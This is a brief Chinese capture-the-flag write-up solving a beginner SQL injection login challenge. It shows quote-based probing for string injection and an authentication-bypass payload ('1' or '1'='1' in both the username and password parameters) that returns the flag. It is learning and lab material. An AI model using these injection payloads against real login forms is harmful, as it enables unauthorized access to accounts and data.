网页环境
可以看到是一个登录窗口,题目已经说了是SQL注入
首先试一下弱口令,admin,123
提示用户名密码错了
既然是第一道题,那应该是很简单了
判断是数字型还是字符型
- 数字型
and 1=1 回显正常
and 1=2 返回异常,存在数字型注入可能
- 字符型
1 返回正常
1' 返回异常,存在字符型注入可能
经过测试,发现username和password两个参数都可以分别注入和同时注入
构造payload
代码语言:javascript复制 url?usename=1'&password=1'
回显报错,存在SQL字符型注入
小试一下万能密码注入
代码语言:javascript复制构造payload
url?usename=1' or '1'='1&password=1' or '1'='1
回显flag
